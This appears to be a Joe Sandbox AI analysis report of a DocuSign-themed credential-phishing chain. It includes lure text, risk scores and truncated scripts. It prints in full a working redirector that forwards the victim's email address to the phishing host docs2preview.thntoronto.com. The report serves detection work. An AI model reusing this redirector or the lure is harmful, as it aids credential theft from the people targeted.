| URL: PDF document Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "You have received a document that requires your review and signature",
"prominent_button_name": "VIEW DOCUMENT",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: PDF document Model: Joe Sandbox AI | {
"brands": [
"DocuSign"
]
} |
|
| URL: https://embeds.beehiiv.com/0905150a-03eb-4be3-9cfe... Model: Joe Sandbox AI | {
"risk_score": 5,
"reasoning": "The script demonstrates some potentially concerning behaviors, such as sending data to an external domain and using an obfuscated URL, but it also appears to have a legitimate purpose related to analytics and client ID tracking. Further review may be necessary to determine the full extent of the script's functionality and potential risks."
} |
(function(){try{if(window.top===window.self)return}catch(a){}var m=!0,d="iframe",e=google_tag_manager["rm"]["65278037"](3),f=2E3,g=200,h=!1,p=function(a){a.origin!==e||"clientId"!==a.data.event&&"parentReady"!==a.data||("clientId"===a.data.event&&window.dataLayer.push({event:"clientId",clientId:a.data.clientId}),"parentReady"!==a.data||h||(window.clearInterval(k),m&&n(),h=!0))},q=function(){f-=g;0>=f&&window.clearInterval(k);window.top.postMessage("childReady",e)},l=function(a){if(!Array.isArray(a)&&"object"===typeof a){a=
JSON.parse(JSON.stringify(a));var b={};b[d]={pageData:{url:document.location.href,title:document.title}};for(var c in a)a.hasOwnProperty(c)&&"gtm.uniqueEventId"!==c&&("event"===c?b.event=d+"."+a[c]:b[d][c]=a[c]);b.event||(b.event=d+".Message");return b}return!1},n=function(){window.dataLayer.forEach(function(b){(b=l(b))&&window.top.postMessage(b,e)});var a=window.dataLayer.push;window.dataLayer.push=function(){var b=[].slice.call(arguments,0);b.forEach(function(c){(c=l(c))&&window.top.postMessage(c,
e)});return a.apply(window.dataLayer,b)}},k=window.setInterval(q,g);window.addEventListener("message",p)})();
|
| URL: https://embeds.beehiiv.com/0905150a-03eb-4be3-9cfe... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "This script appears to be collecting and storing user risk data in the browser's local storage. While the intent is unclear, storing sensitive risk information in local storage without proper security measures is a moderate risk behavior that requires further investigation."
} |
window.PXeBumDLwe_asyncInit = function (px) {
px.Events.on('risk', function (risk, name) {
localStorage.setItem("pxcookie", risk + "=" + name);
});
};
|
| URL: https://embeds.beehiiv.com/0905150a-03eb-4be3-9cfe... Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. The use of an iframe to load additional scripts and the obfuscation of the script's purpose raise significant security concerns. While the script may have a legitimate purpose, such as a challenge platform, the overall behavior is highly suspicious and poses a high risk of malicious activity."
} |
(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'901e33b4eac042e2',t:'MTczNjg2Mzc0Ny4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);else{var e=document.onreadystatechange||function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();
|
| URL: https://efil20250113doc32478234128471289489fil2383... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The script demonstrates moderate-risk behaviors, including external data transmission (sending the email parameter to random links) and potential redirects to suspicious domains. While the intent may be benign, the lack of transparency and the use of random links raise concerns. Further review is recommended to ensure the script's purpose and the legitimacy of the linked domains."
} |
// Function to extract email from URL parameter
function getEmailFromUrl() {
var urlParams = new URLSearchParams(window.location.search);
var email = urlParams.get('email');
return email ? decodeURIComponent(email.replace(/\+/g, ' ')) : null; // Decode and return the email
}
// Function to choose a random link and redirect with email parameter
function chooseRandomLinkAndRedirect(email) {
// Check if email parameter is null
if (!email) {
window.location.replace('https://www.raymondjames.com/-/media/rj/common/investment-strategy-publications/investment-strategy-quarterly');
return;
}
// Array of random links
var links = [
'https://docs2preview.thntoronto.com/',
'https://docs2preview.thntoronto.com/',
];
// Choose a random link
var randomLink = links[Math.floor(Math.random() * links.length)];
// Construct the final URL with email parameter
var finalUrl = randomLink + '?username=' + encodeURIComponent(email);
// Redirect to the constructed URL
window.location.replace(finalUrl);
}
// Execute the random link selection and redirection logic
window.onload = function() {
// Extract email from URL parameter
var email = getEmailFromUrl();
// Redirect with email appended to the random link
chooseRandomLinkAndRedirect(email);
};
|
| URL: https://embeds.beehiiv.com/static/js/main.7276d47b... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The provided JavaScript snippet contains several behaviors that raise moderate security concerns. While it does not exhibit any clear malicious intent, the script engages in external data transmission, uses fallback domains, and performs aggressive DOM manipulation. These practices, if not properly implemented or contextualized, could potentially lead to data leakage or other security issues. Further review and validation of the script's purpose and implementation would be recommended to determine the overall risk level."
} |
(this["webpackJsonpexternal-embed"]=this["webpackJsonpexternal-embed"]||[]).push([[0],{105:function(e,t,n){"use strict";n.r(t);var a,o,r,i,c,l,u,s=n(0),d=n.n(s),p=n(39),m=n.n(p),h=n(6),b=n(7),f=n(9),g=n(8),v=n(110),S=n(107),y=n(111),x=n(16),E=n(4),w=n(5),_=w.a.div(a||(a=Object(E.a)(["\n position: relative;\n display: flex;\n align-items: center;\n justify-content: center;\n height: 100vh;\n width: 100vw;\n box-sizing: border-box;\n text-align: center;\n padding: 12px;\n background-color: ",";\n"])),(function(e){return e.backgroundColor?e.backgroundColor:"#f3f4f6"})),O=w.a.div(o||(o=Object(E.a)(["\n max-width: 28rem;\n margin-left: auto;\n margin-right: auto;\n"]))),C=w.a.div(r||(r=Object(E.a)(["\n margin-bottom: 1.5rem;\n"]))),k=w.a.h2(i||(i=Object(E.a)(["\n color: ",";\n font-family: ",";\n font-size: 28px;\n line-height: 1;\n margin-block: 0;\n margin-bottom: 0.4;\n"])),(function(e){return e.textColor?e.textColor:"#000"}),(function(e){return e.fontFamily?e.fontFamily:"Open-Sans"})),j=w.a.p(c||(c=Object(E.a)(["\n font-family: ",";\n font-size: 14px;\n font-weight: 400;\n color: ",";\n"])),(function(e){return e.fontFamily?e.fontFamily:"Open-Sans"}),(function(e){return e.textColor?e.textColor:"#000"})),F=w.a.a(l||(l=Object(E.a)(["\n"]))),I=w.a.img(u||(u=Object(E.a)(["\n position: absolute;\n display: block;\n right: 12px;\n bottom: 12px;\n max-height: 18px;\n opacity: .3;\n transition: all .25s ease-out;\n\n :hover {\n opacity: 1;\n }\n"]))),A=function(e){Object(f.a)(n,e);var t=Object(g.a)(n);function n(){return Object(h.a)(this,n),t.apply(this,arguments)}return Object(b.a)(n,[{key:"render",value:function(){return d.a.createElement(F,{target:"_blank",href:this.props.targetUrl},d.a.createElement(I,{src:"/img/beehiiv-logo.png"}))}}]),n}(s.Component);A.defaultProps={targetUrl:"https://www.beehiiv.com"};var T,P=A,R=function(e){Object(f.a)(n,e);var t=Object(g.a)(n);function n(){return Object(h.a)(this,n),t.apply(this,arguments)}return Object(b.a)(n,[{key:"render",value:function(){return d.a.createElement(_,null,d.a.createElement(O,null,d.a.createElement(C,null,d.a.createElement(k,null,"Not found"),d.a.createElement(j,null,"Oops. We can't find what you're looking for."))),d.a.createElement(P,null))}}]),n}(s.Component),N=n(44),L=n(108),M=n(109),B=n(2),U=n.n(B),D=n(40),z=n.n(D),H=n(31),q=n.n(H),V=n(17),W=n(41),G=n.n(W),J=n(25),Q=w.a.div(T||(T=Object(E.a)(["\n font-size: 42px;\n display: flex;\n align-items: center;\n justify-content: center;\n margin-bottom: 20px;\n color: ",";\n"])),(function(e){return e.color?e.color:"#000"})),Y=function(e){Object(f.a)(n,e);var t=Object(g.a)(n);function n(){return Object(h.a)(this,n),t.apply(this,arguments)}return Object(b.a)(n,[{key:"render",value:function(){return d.a.createElement(Q,{color:this.props.color},d.a.createElement(J.Dot,null,"."),d.a.createElement(J.Dot,null,"."),d.a.createElement(J.Dot,null,"."))}}]),n}(s.Component);Y.defaultProps={color:"#000"};var K,X,Z,$,ee,te,ne,ae,oe,re=Y,ie=d.a.createElement("svg",{viewBox:"0 0 24 24",stroke:"currentColor"},d.a.createElement("path",{d:"M9.5,18.2c-0.4,0.4-1,0.4-1.4,0l-3.8-3.8C4,14,4,13.4,4.3,13s1-0.4,1.4,0l3.1,3.1l8.6-8.6c0.4-0.4,1-0.4,1.4,0s0.4,1,0,1.4 L9.5,18.2z"})),ce=function(e){Object(f.a)(n,e);var t=Object(g.a)(n);function n(){return Object(h.a)(this,n),t.apply(this,arguments)}return Object(b.a)(n,[{key:"render",value:function(){return d.a.createElement("div",{className:this.props.className},ie)}}]),n}(s.Component),le=n(18),ue={"Content-Type":"application/json",Accept:"application/json"},se=n(33),de=function(e){var t=e.name,n=e.category,a=e.action,o=e.label,r=void 0===o?window.location.href:o,i=e.value,c=void 0===i?0:i,l=e.data,u=void 0===l?{}:l;if("undefined"!==typeof window.dataLayer){var s=new Date;window.dataLayer.push({event:t,eventProps:Object(le.a)({category:n,action:a,label:r,value:c,timestamp:s.toISOString()},u)})}},pe=w.a.form(K||(K=Object(E.a)(["\n margin-left: auto;\n margin-right: auto;\n |
| URL: https://www.googletagmanager.com/gtm.js?id=GTM-WJX... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The script demonstrates several moderate-risk behaviors, including external data transmission, fallback domains, and aggressive DOM manipulation. While it does not exhibit any high-risk indicators like dynamic code execution or data exfiltration, the overall behavior is somewhat suspicious and requires further review."
} |
// Copyright 2012 Google Inc. All rights reserved.
(function(w,g){w[g]=w[g]||{};
w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');
(function(){
var data = {
"resource": {
"version":"7",
"macros":[{"function":"__e"},{"function":"__f","vtp_component":"URL"},{"function":"__jsm","vtp_javascript":["template","(function(){var a=",["escape",["macro",1],8,16],";return a.replace(\/\\\/$\/,\"\")})();"]},{"function":"__jsm","vtp_javascript":["template","(function(){return(start=Math.floor(Date.now()\/1E3))||\"\"})();"]},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__e"}],
"tags":[{"function":"__html","metadata":["map"],"once_per_event":true,"vtp_html":["template","\u003Cscript type=\"text\/gtmscript\"\u003E(function(){try{if(window.top===window.self)return}catch(a){}var m=!0,d=\"iframe\",e=",["escape",["macro",2],8,16],",f=2E3,g=200,h=!1,p=function(a){a.origin!==e||\"clientId\"!==a.data.event\u0026\u0026\"parentReady\"!==a.data||(\"clientId\"===a.data.event\u0026\u0026window.dataLayer.push({event:\"clientId\",clientId:a.data.clientId}),\"parentReady\"!==a.data||h||(window.clearInterval(k),m\u0026\u0026n(),h=!0))},q=function(){f-=g;0\u003E=f\u0026\u0026window.clearInterval(k);window.top.postMessage(\"childReady\",e)},l=function(a){if(!Array.isArray(a)\u0026\u0026\"object\"===typeof a){a=\nJSON.parse(JSON.stringify(a));var b={};b[d]={pageData:{url:document.location.href,title:document.title}};for(var c in a)a.hasOwnProperty(c)\u0026\u0026\"gtm.uniqueEventId\"!==c\u0026\u0026(\"event\"===c?b.event=d+\".\"+a[c]:b[d][c]=a[c]);b.event||(b.event=d+\".Message\");return b}return!1},n=function(){window.dataLayer.forEach(function(b){(b=l(b))\u0026\u0026window.top.postMessage(b,e)});var a=window.dataLayer.push;window.dataLayer.push=function(){var b=[].slice.call(arguments,0);b.forEach(function(c){(c=l(c))\u0026\u0026window.top.postMessage(c,\ne)});return a.apply(window.dataLayer,b)}},k=window.setInterval(q,g);window.addEventListener(\"message\",p)})();\u003C\/script\u003E"],"vtp_supportDocumentWrite":false,"vtp_enableIframeMode":false,"vtp_enableEditJsMacroBehavior":false,"tag_id":3}],
"predicates":[{"function":"_eq","arg0":["macro",0],"arg1":"gtm.js"}],
"rules":[[["if",0],["add",0]]]
},
"runtime":[ [50,"__e",[46,"a"],[36,[13,[41,"$0"],[3,"$0",["require","internal.getEventData"]],["$0","event"]]]]
,[50,"__f",[46,"a"],[52,"b",["require","copyFromDataLayer"]],[52,"c",["require","getReferrerUrl"]],[52,"d",["require","makeString"]],[52,"e",["require","parseUrl"]],[52,"f",[15,"__module_legacyUrls"]],[52,"g",[30,["b","gtm.referrer",1],["c"]]],[22,[28,[15,"g"]],[46,[36,["d",[15,"g"]]]]],[38,[17,[15,"a"],"component"],[46,"PROTOCOL","HOST","PORT","PATH","QUERY","FRAGMENT","URL"],[46,[5,[46,[36,[2,[15,"f"],"getProtocol",[7,[15,"g"]]]]]],[5,[46,[36,[2,[15,"f"],"getHost",[7,[15,"g"],[17,[15,"a"],"stripWww"]]]]]],[5,[46,[36,[2,[15,"f"],"getPort",[7,[15,"g"]]]]]],[5,[46,[36,[2,[15,"f"],"getPath",[7,[15,"g"],[17,[15,"a"],"defaultPages"]]]]]],[5,[46,[22,[17,[15,"a"],"queryKey"],[46,[36,[2,[15,"f"],"getFirstQueryParam",[7,[15,"g"],[17,[15,"a"],"queryKey"]]]]]],[52,"h",["e",[15,"g"]]],[36,[2,[17,[15,"h"],"search"],"replace",[7,"?",""]]]]],[5,[46,[36,[2,[15,"f"],"getFragment",[7,[15,"g"]]]]]],[5,[46]],[9,[46,[36,[2,[15,"f"],"removeFragment",[7,["d",[15,"g"]]]]]]]]]]
,[50,"__html",[46,"a"],[52,"b",["require","internal.injectHtml"]],["b",[17,[15,"a"],"html"],[17,[15,"a"],"gtmOnSuccess"],[17,[15,"a"],"gtmOnFailure"],[17,[15,"a"],"useIframe"],[17,[15,"a"],"supportDocumentWrite"]]]
,[50,"__jsm",[46,"a"],[52,"b",["require","internal.executeJavascriptString"]],[22,[20,[17,[15,"a"],"javascript"],[44]],[46,[36]]],[36,["b",[17,[15,"a |
| URL: https://client.px-cloud.net/PXeBumDLwe/main.min.js... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The provided JavaScript snippet exhibits several behaviors that raise moderate security concerns. It includes the following indicators:
1. Moderate-Risk Indicators:
- External Data Transmission: The script sends user data to the `collector-a.px-cloud.net` domain via an XHR request, which could potentially include sensitive information.
- Fallback Domains: The script uses multiple fallback domains (`/init.js`, `/main.min.js`), some of which may be untrusted.
2. Contextual Adjustments:
- Suspicious Domains: The `collector-a.px-cloud.net` domain is not a well-known, reputable domain, which adds a slight risk factor.
Overall, the script appears to be part of a third-party analytics or tracking solution, but the lack of transparency around the data being transmitted and the use of fallback domains raise moderate security concerns. Further investigation may be needed to determine the legitimacy and purpose of this script."
} |
// @license Copyright (C) 2014-2025 PerimeterX, Inc (www.perimeterx.com). Content of this file can not be copied and/or distributed.
try{window._pxAppId="PXeBumDLwe",function(){"use strict";function t(e){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},t(e)}function e(t,e){(null==e||e>t.length)&&(e=t.length);for(var n=0,r=new Array(e);n<e;n++)r[n]=t[n];return r}function n(t,n){if(t){if("string"==typeof t)return e(t,n);var r=Object.prototype.toString.call(t).slice(8,-1);return"Object"===r&&t.constructor&&(r=t.constructor.name),"Map"===r||"Set"===r?Array.from(t):"Arguments"===r||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(r)?e(t,n):void 0}}function r(t){return function(t){if(Array.isArray(t))return e(t)}(t)||function(t){if("undefined"!=typeof Symbol&&null!=t[Symbol.iterator]||null!=t["@@iterator"])return Array.from(t)}(t)||n(t)||function(){throw new TypeError("Invalid attempt to spread non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}()}var a=window,o=document,i=navigator,c=location,u="undefined",s="boolean",l="number",f="string",h="function",d="object",p=null,v=["/init.js","/main.min.js"],m="https://collector-a.px-cloud.net/api/v2/collector/clientError?r=",g="pxhc",y="pxjsc",b="c",T="b",E="function",S=window,w=document,I="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",A=/[^+/=0-9A-Za-z]/,R=S.atob,x=S.btoa,O=t(R),C=t(x);function k(t){return C===E?x(encodeURIComponent(t).replace(/%([0-9A-F]{2})/g,(function(t,e){return String.fromCharCode("0x"+e)}))):function(t){var e,n,r,a,o,i=S.unescape||S.decodeURI,c=0,u=0,s=[];if(!t)return t;try{t=i(encodeURIComponent(t))}catch(e){return t}do{e=(o=t.charCodeAt(c++)<<16|t.charCodeAt(c++)<<8|t.charCodeAt(c++))>>18&63,n=o>>12&63,r=o>>6&63,a=63&o,s[u++]=I.charAt(e)+I.charAt(n)+I.charAt(r)+I.charAt(a)}while(c<t.length);var l=s.join(""),f=t.length%3;return(f?l.slice(0,f-3):l)+"===".slice(f||3)}(t)}function M(t){return O===E?R(t):function(t){var e,n,r,a,o=[],i=0,c=t.length;try{if(A.test(t)||/=/.test(t)&&(/=[^=]/.test(t)||/={3}/.test(t)))return null;for(c%4>0&&(c=(t+=S.Array(4-c%4+1).join("=")).length);i<c;){for(n=[],a=i;i<a+4;)n.push(I.indexOf(t.charAt(i++)));for(r=[((e=(n[0]<<18)+(n[1]<<12)+((63&n[2])<<6)+(63&n[3]))&255<<16)>>16,64===n[2]?-1:(65280&e)>>8,64===n[3]?-1:255&e],a=0;a<3;++a)(r[a]>=0||0===a)&&o.push(String.fromCharCode(r[a]))}return o.join("")}catch(t){return null}}(t)}var B,X,V,F={on:function(t,e,n){this.subscribe(t,e,n,!1)},one:function(t,e,n){this.subscribe(t,e,n,!0)},off:function(t,e){var n,r;if(void 0!==this.channels[t])for(n=0,r=this.channels[t].length;n<r;n++){if(this.channels[t][n].fn===e){this.channels[t].splice(n,1);break}}},subscribe:function(t,e,n,r){void 0===this.channels&&(this.channels={}),this.channels[t]=this.channels[t]||[],this.channels[t].push({fn:e,ctx:n,once:r||!1})},trigger:function(e){if(this.channels&&this.channels.hasOwnProperty(e)){for(var n=Array.prototype.slice.call(arguments,1),r=[];this.channels[e].length>0;){var a=this.channels[e].shift();t(a.fn)===h&&a.fn.apply(a.ctx,n),a.once||r.push(a)}this.channels[e]=r}}},P={cloneObject:function(t){var e={};for(var n in t)t.hasOwnProperty(n)&&(e[n]=t[n]);return e},extend:function(t,e){var n=P.cloneObject(e);for(var r in n)n.hasOwnProperty(r)&&(t[r]=n[r]);return t}},N=/[\\\"\u0000-\u001f\u007f-\u009f\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g,_={"\b":"\\b","\t":"\\t","\n":"\\n","\f":"\\f","\r":"\\r","\v":"\\v",'"':'\\"',"\\":"\\\\"},U='"undefined"',W="null";function Z(){var e,n,r,a="";if('"'===X)for(;D();){if('"'===X)return D(),a;if("\\"===X)if(D(),"u"===X){for(r=0,n=0;n<4&&(e=parseInt(D(),16),isFinite(e));n+=1)r=16*r+e;a+=String.fromCharCode(r)}else{if(t(Y[X])!==f)break;a+=Y[X]}else a+=X}Q("Bad string")}function D(t){return t& |
| URL: https://embeds.beehiiv.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": true
} |
URL: https://embeds.beehiiv.com |
| URL: https://embeds.beehiiv.com/0905150a-03eb-4be3-9cfe-57b6f334ec52 Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Sign-in authentication with recipient email is required to review and electronically sign the pending document. There is no requirement for a paper copy to be produced if completed with DocuSign.",
"prominent_button_name": "Proceed",
"text_input_field_labels": [
"Enter your email"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://embeds.beehiiv.com/0905150a-03eb-4be3-9cfe-57b6f334ec52 Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Sign-in authentication with recipient email is required to review and electronically sign the pending document. There is no requirement for a paper copy to be produced if completed with DocuSign.",
"prominent_button_name": "Proceed",
"text_input_field_labels": [
"asasd@asasd"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://embeds.beehiiv.com/0905150a-03eb-4be3-9cfe-57b6f334ec52 Model: Joe Sandbox AI | {
"brands": [
"DocuSign"
]
} |
|
| URL: https://embeds.beehiiv.com/0905150a-03eb-4be3-9cfe-57b6f334ec52 Model: Joe Sandbox AI | {
"brands": [
"DocuSign"
]
} |
|
| URL: https://embeds.beehiiv.com/0905150a-03eb-4be3-9cfe-57b6f334ec52 Model: Joe Sandbox AI | ```json{ "legit_domain": "docusign.com", "classification": "wellknown", "reasons": [ "The brand 'DocuSign' is a well-known brand associated with the domain 'docusign.com'.", "The URL 'embeds.beehiiv.com' does not match the legitimate domain for DocuSign.", "The domain 'beehiiv.com' is not commonly associated with DocuSign.", "The presence of a subdomain 'embeds' and a different primary domain 'beehiiv.com' is suspicious.", "The input field 'Enter your email' is a common phishing tactic to collect user credentials." ], "riskscore": 8}
Google indexed: False |
URL: embeds.beehiiv.com
Brands: DocuSign
Input Fields: Enter your email |
| URL: https://embeds.beehiiv.com/0905150a-03eb-4be3-9cfe-57b6f334ec52 Model: Joe Sandbox AI | ```json{ "legit_domain": "docusign.com", "classification": "wellknown", "reasons": [ "The brand 'DocuSign' is well-known and typically associated with the domain 'docusign.com'.", "The URL 'embeds.beehiiv.com' does not match the legitimate domain for DocuSign.", "The domain 'beehiiv.com' does not have any known association with DocuSign.", "The presence of a subdomain 'embeds' and the unrelated primary domain 'beehiiv.com' is suspicious.", "The URL does not contain any direct reference to 'docusign', which is a red flag for phishing." ], "riskscore": 9}
Google indexed: False |
URL: embeds.beehiiv.com
Brands: DocuSign
Input Fields: asasd@asasd |
| URL: https://docs2preview.thntoronto.com/?username=asas... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code. While it may have some legitimate functionality, the overall risk level is high due to the potential for malicious activities."
} |
function a0z4(){var uJ=['WOkmG','eQDai','catch','aInwI','location','read','OljPE','defineProperty','Deno/','cVoyg','raw','KpjJJ','BROWSER','releaseLock','enumerable','_subscribe','delegate','observable','ops','getOwnPropertyDescriptor','close','182060qAfpZJ','AS_ENTRIES','3081288vLmgxD','TuETz','toString','DENO','RegExp','sham','Unable\x20to\x20lift\x20unknown\x20Observable\x20type','send','TypeError','RauAi','kIZye','script','REST','AumWD','yjWTE','parentWindow','khIRM','onStoppedNotification','ZBwOB','target','783517DanaCN','lift','flags','Reflect','pGOCA','Scheduled\x20action\x20threw\x20falsy\x20error','PromiseRejectionEvent','wdnCL','WkkbR','type','for','@@iterator','EMPTY','create','sjIVH','OiRaD','done','rejection','Array','qCfsh','RZyuP','GHjHO','isPrototypeOf','Object','qEEdf','nRLBc','ryAQk','OXOJB','hasIndices','_infiniteTimeWindow','importScripts','oprIC','kvPgU','unscopables','iframe','cAPks','multiline','npfSK','NzGAL','display','iLSeR','vSHGG','rFhnV','recycleAsyncId','megXw','WdOoG','head','remove','oqzyS','replace','_bufferSize','now','MfqwM','Symbol.asyncIterator\x20is\x20not\x20defined.','abcd','_trimBuffer','string','table','currentObservers','iterator','SmfCn','qZqgM','pNpVI','setPrototypeOf','toPromise','_hasParent','addEventListener','10eNKnTm','\x0a\x20\x20','promise','pure','Nicej','Provided\x20object\x20does\x20not\x20correctly\x20implement\x20Symbol.observable','_timestampProvider','number','Can\x27t\x20set\x20','shift','port1','_socket','versions','info','code','message','_finalizers','SCRuQ','schedulerActionCtor','binaryType','valueOf','yvHaW','Symbol.iterator\x20is\x20not\x20defined.','none','\x20is\x20not\x20a\x20constructor\x20or\x20null','trys','onerror','1447376wBHgoW','sTRas','execute','pending','uZint','AAEmI','parent','Cloudflare-Workers','JfSaC','OpMfB','_execute','closed','source','defineProperties','[object\x20','186213gnsdfc','NATIVE','pOhbb','top','configurable','KJcbn','_next','247376LlKTBe','nextTick','getterFor','ObjectUnsubscribedError','Math','no\x20WebSocket\x20constructor\x20can\x20be\x20found','symbol','lsqxL','unhandledRejection','normal','NODE','ONaYf','toLocaleString','vWRLr','closeObserver','_removeParent','__core-js_shared__','executing\x20a\x20cancelled\x20action','clearInterval','unhandledrejection','delay','object\x20unsubscribed','bBLDB','withoutSetter','dXWCe','nonConfigurable','nhtQm','Bad\x20Promise\x20constructor','muuTD','onFinalize','bhaXQ','charAt','Can\x27t\x20convert\x20object\x20to\x20primitive\x20value','WeakMap','all','REzzk','arity','HOQcn','an\x20invalid\x20object','Event','{}.constructor(\x22return\x20this\x22)(\x20)','GkKZo','1483564jCetDu','cckUj','createElement','knqhT','test','peIcz','find','ENunU','Cuvgq','scheduler','finalize','cNmJl','Arguments','TcPfL','SAPbn','xoLHI','hasOwn','iDXrI','stat','userAgent','nonWritable','complete','Not\x20enough\x20arguments','xNWjU','tail','ERvLz','SnyOl','indexOf','Bun','36oWNaZX','_throwIfClosed','partialObserver','unsubscribe','dSgRI','sWbDD','notified','initialTeardown','OLVRs','@@observable','tmcIb','fODeV','OsUUK','ghGpC','actions','filter:hue-rotate(','domain','observers','btFco','KPoPb','GeneratorFunction','8fzVppw','nmUVj','resolve','BbxyD','stack','axJry','push','hTzOL','default','open','JEQDs','VhTNS','49544WHHpYK','from','observed','wWraH','unicode','assign','KwULP','console','hasError','exports','sticky','LBEDS','requestAsyncId','tJpNE','useDeprecatedNextContext','serializer','emit','Symbol(','querySelector','[object\x20z]','keys','inspectSource','construct','tEOvg','ejfoX','\x20is\x20not\x20iterable','map','WJcYf','icMLV','dontCallGetSet','hCYPL','mGqeb','self','Accessors\x20not\x20supported','pLbYt','Null','\x20is\x20not\x20a\x20constructor','nouAb','timeout','max','CEvwa','iVnCV','Sgpbw','_buffer','errorThrown','_config','\x20is\x20not\x20a\x20function','qyiRp','FuPYk','tehpz','operator','tTMHa','dotAll','slice','enter','undefined','__proto__','yZhya','VpmRB','CONFIGURABLE','lmEco','kxYBg','closingO |
| URL: https://docs2preview.thntoronto.com/?username=asasd%40asassda.com Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Verify You're Human",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://docs2preview.thntoronto.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": true
} |
URL: https://docs2preview.thntoronto.com |
| URL: https://docs2preview.thntoronto.com/?username=asas... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The provided JavaScript snippet contains several behaviors that raise moderate security concerns. While it does not exhibit any high-risk indicators, the script demonstrates the following moderate-risk behaviors:
1. External Data Transmission: The script sends user data (e.g., username, client-request-id) to an external domain (`login.microsoftonline.com`) via a POST request. This could potentially lead to data exfiltration if the destination is not a trusted domain.
2. Fallback Domains: The script uses multiple fallback domains (`397988c3-569ab540.thntoronto.com`, `e6f0455a-569ab540.thntoronto.com`) for various resources, which could indicate an attempt to bypass security measures or serve content from untrusted sources.
3. Aggressive DOM Manipulation: The script appears to heavily manipulate the DOM, repeatedly altering or clearing the page content, which could be a sign of potentially malicious behavior.
Additionally, the script uses some legacy practices, such as the `XDomainRequest` API, which pose minor risks but are not inherently malicious.
Given the combination of moderate-risk behaviors and the lack of any high-risk indicators, the overall risk score for this script is assessed as 6 (Medium Risk). Further investigation may be warranted to determine the legitimacy and intended purpose of the script."
} |
//<![CDATA[
